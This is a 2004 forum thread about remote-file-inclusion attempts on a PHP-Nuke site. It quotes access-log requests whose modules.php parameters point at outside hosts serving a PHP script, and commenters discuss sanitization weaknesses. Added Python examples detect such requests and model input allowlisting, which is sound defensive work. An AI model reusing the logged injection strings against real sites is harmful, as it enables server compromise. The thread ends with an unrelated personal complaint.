New hacking attempt on my site!!!

scandicdiscopub writes "They've been trying to hack my site again,
http://www.grancanariayoungsters.com
this time trying to get a script injected as a module.
In my ms analysis at modules I had a really strange URL there.
http://republica.bg/.i/2
Check it out, that site has got loads of scripts!!
IP of the guy is:
11:17:43 Guest http://republica.bg/.i/2 Unknown Other Other 64.191.57.190
I traced it and it looks like it comes from California, but I'm not an expert on this tracing stuff...
Somebody please have a look!
SUBMIT THIS IMMEDIATELY PLZ
Admin Note: What other information do you have that may indicate this is a hacking attempt?"
Posted on Monday, January 12 @ 09:44:30 CET by Zhen-Xjell

Re: New hacking attempt on my site!!! (Score: 1) by scandicdiscopub on Monday, January 12 @ 12:40:05 CET
Because of this script, I think it's a rather unusual script for a bot or so.
I'm not good with security, but in my eyes someone is trying to get specific information, and I reported it because I think that's suspicious, and would like your expertise.

Re: New hacking attempt on my site!!! (Score: 1) by scandicdiscopub on Monday, January 12 @ 13:24:58 CET
64.191.57.190 - - [12/Jan/2004:12:15:04 +0100] "GET /modules.php?name=http://republica.bg/.i/2 HTTP/1.0" 200 43814 "-" "Python-urllib/1.15"
and
64.191.57.190 - - [12/Jan/2004:12:17:40 +0100] "GET /modules.php?name=http://republica.bg/.i/2&file=http://republica.bg/.i/2 HTTP/1.0" 200 43871 "-" "Python-urllib/1.15"

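Added example, not part of the original thread: a Python check that scans Apache combined-format access logs for requests like the two quoted above, where a modules.php parameter carries a URL instead of a module name. The two 64.191.57.190 lines are copied from the comment; the 192.0.2.x lines, the function name and the list of schemes are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<agent>[^"]*)"'
)
# A parameter value that starts with a URL scheme points the script at another host.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

def find_remote_include_attempts(lines, script="/modules.php"):
    """Return one finding per request to `script` whose parameters carry a URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        target = urlsplit(m["target"])
        if target.path != script:
            continue
        # parse_qsl percent-decodes, so name=http%3A%2F%2F... is caught as well
        params = [k for k, v in parse_qsl(target.query, keep_blank_values=True)
                  if REMOTE_RE.match(v)]
        if params:
            findings.append({
                "ip": m["ip"], "time": m["time"], "params": params,
                # 200 only says the script answered, not that the include ran
                "status": int(m["status"]), "agent": m["agent"],
            })
    return findings

SAMPLE_LOG = [
    # the two requests quoted in the thread
    '64.191.57.190 - - [12/Jan/2004:12:15:04 +0100] "GET /modules.php?name=http://republica.bg/.i/2 HTTP/1.0" 200 43814 "-" "Python-urllib/1.15"',
    '64.191.57.190 - - [12/Jan/2004:12:17:40 +0100] "GET /modules.php?name=http://republica.bg/.i/2&file=http://republica.bg/.i/2 HTTP/1.0" 200 43871 "-" "Python-urllib/1.15"',
    # constructed: an ordinary module request and a percent-encoded variant
    '192.0.2.10 - - [12/Jan/2004:12:20:00 +0100] "GET /modules.php?name=News&file=article&sid=1 HTTP/1.0" 200 20110 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [12/Jan/2004:12:21:00 +0100] "GET /modules.php?name=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.0" 200 43800 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in find_remote_include_attempts(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], ",".join(f["params"]), f["agent"])
```

The check keys on the parameter value, not on the user agent, so a request with a browser-like agent string is flagged the same way.
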
Re: New hacking attempt on my site!!! (Score: 1) by scandicdiscopub on Monday, January 12 @ 13:56:57 CET
I can't seem to get into the forums, but thanks a lot. Next time, before making any suggestions, I will think twice. Thank you very much, and I will look into it more,
so situations that make you lose your time can be avoided in future.

Re: New hacking attempt on my site!!! (Score: 1) by Zhen-Xjell on Monday, January 12 @ 14:16:32 CET http://castlecops.com
No worries... it actually might help someone out too that is not commenting here. Happens a lot that kind of indirect help... :D

Re: New hacking attempt on my site!!! (Score: 1) by kipuka on Monday, January 12 @ 17:09:09 CET
I disagree. These guys were indeed trying to break in like you originally thought. Don't focus on the UA string because that can easily be faked out. Look at the URL string instead. They were trying to upload this file and run it on your server. (note: I had to intentionally break the code up by adding extra spaces and underscores because Nuke's filter wouldn't allow it to be displayed here.)
These guys tried twice and got 200's both times. I don't know if they were really successful in executing this but it was a hacker visit and not a harmless crawl or fetch of a page. I cannot execute system calls like this on my server. I suggest you grab a fresh copy of this code off their site, put it in a file on your server, and duplicate what they tried to do to see if they got anything off your server and whether this is a vulnerability or not.

Re: New hacking attempt on my site!!! (Score: 1) by kipuka on Monday, January 12 @ 17:13:21 CET
Grrr. I got this to display all nicely in preview but it still got filtered out. Oh well, go to this url you cited: http://republica.bg/.i/2 and look in the file they tried to upload. You will see a php script with system commands in it.

Re: New hacking attempt on my site!!! (Score: 1) by kipuka on Monday, January 12 @ 17:39:28 CET
I tried uploading a file from another domain this way and it doesn't work on my system. Looking at the code in 6.9 for this particular file, I don't see anyone being able to upload anything off-server like this. I don't know if the same applies for all the other versions.

Re: New hacking attempt on my site!!! (Score: 1) by Zhen-Xjell on Monday, January 12 @ 22:21:17 CET http://castlecops.com
Changing user-agents is certainly a trivial task. However, the agent being used is somewhat of an obscure one that not many folks know.
But take a look at the request to the server:
/modules.php?name=http://republica.bg/.i/2
It's trying to call a module that tends to be a URL. There is no provision there to upload a file to the server. This doesn't provide for any cross site scripting.

Re: New hacking attempt on my site!!! (Score: 1) by kipuka on Tuesday, January 13 @ 06:37:09 CET
I agree the UA is not very common and as such was effective in diverting attention. The focus though needs to stay on the URL when a visitor adds an off-site domain to it, and the code checked for vulnerabilities if it hasn't already been.
I went back and looked at this a little more. I still don't see someone being able to upload a file this way at least not in 6.9. However, I think you should note:
-- The variable $name is not properly sanitized here before being used in a sql call.
-- The sanitization routine for $_GET variables in mainfile.php lacks a check for single quote usage.
-- As you know already, phpnuke uses globals quite freely. These can be set via $_GET, $_POST, or $_COOKIE. Unless the code specifically limits the method used for setting a variable, whatever you're filtering out in $_GET most likely should be done for $_POST and $_COOKIE too.

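Added example, not part of the original thread and not PHP-Nuke code: a Python model of the last point above, in which a check that inspects only the GET value passes while the value the script actually uses arrives by cookie, next to an allowlist check on the effective value. The GET, POST, COOKIE merge order, the function names, the deny-list check and the module-name pattern are assumptions of this sketch.

```python
import re

# Assumption: a module name is a plain directory name, so letters, digits
# and underscores are the only characters allowed.
MODULE_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")

def effective_value(key, get, post, cookie):
    """Model of globals filled from GET, then POST, then COOKIE: the last source wins."""
    merged = {}
    for source in (get, post, cookie):
        merged.update(source)
    return merged.get(key)

def get_only_filter(key, get, post, cookie):
    """Weak check (hypothetical): a deny-list applied to the GET value alone."""
    return "://" not in get.get(key, "")

def validate_module_name(key, get, post, cookie):
    """Hardened check: allowlist the value the script will actually use."""
    value = effective_value(key, get, post, cookie)
    if value is None or not MODULE_NAME_RE.fullmatch(value):
        return None  # reject; the caller falls back to a default page
    return value

if __name__ == "__main__":
    # Constructed request: harmless GET value, URL supplied by cookie.
    get, post, cookie = {"name": "News"}, {}, {"name": "http://example.invalid/x"}
    print("GET-only filter passes:", get_only_filter("name", get, post, cookie))
    print("value the script sees: ", effective_value("name", get, post, cookie))
    print("allowlist result:      ", validate_module_name("name", get, post, cookie))
```

Because the allowlist admits neither quotes nor slashes, the same check also rejects a value carrying a single quote, whichever source it arrives from.
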
Re: New hacking attempt on my site!!! (Score: 1) by scandicdiscopub on Tuesday, January 13 @ 06:45:44 CET
Hmm, now yet another URL came up in my msanalysis, and it is this one:
http://www.grancanariayoungsters.com/modules.php?name=http://202.169.225.211/sms/topix.txt?
http://202.169.225.211/sms/topix.txt? Looking at this one, it looks like an SQL injection.
I'm crying here, although if I'm correct, stuff like that only works on Windows machines and not on Linux, yes?

Re: New hacking attempt on my site!!! (Score: 1) by Zhen-Xjell on Tuesday, January 13 @ 10:02:29 CET http://castlecops.com
If you try that actual link you'll notice that it says such a file doesn't exist. Hacking attempts on servers and workstations across the net seem to be a natural problem. One has to decide which ones matter, and which ones can be ignored. With this data so far if it happened on NC, I would ignore it. But that's MHO.

Re: New hacking attempt on my site!!! (Score: 1) by alaskanvictim on Thursday, February 12 @ 21:41:36 CET
must be crooked cops, I just subscribed to complain about the Anchorage police dept bugging my web telephone, apartment, and running a name calling campaign against me for they broke into my safety deposit box and robbed me, they said if anyone talked to me was going to be arrested, and I got death threats, and we are constantly followed, and run off the road by their links, now I subscribed here, and my password shows in the email u sent me so APD already know the new password, and they will impersonate me as they always do, and if u sent me another they will see it too, I can't do anything in the internet they disconnect everything, bug and disable my links, and no one will dare to talk to us unless he/she is Anchorage police sent, I don't even get my emails they deleted me from all my lists, my web is so so slow, because of their bug, please help
I am afraid for our lives.
thank you,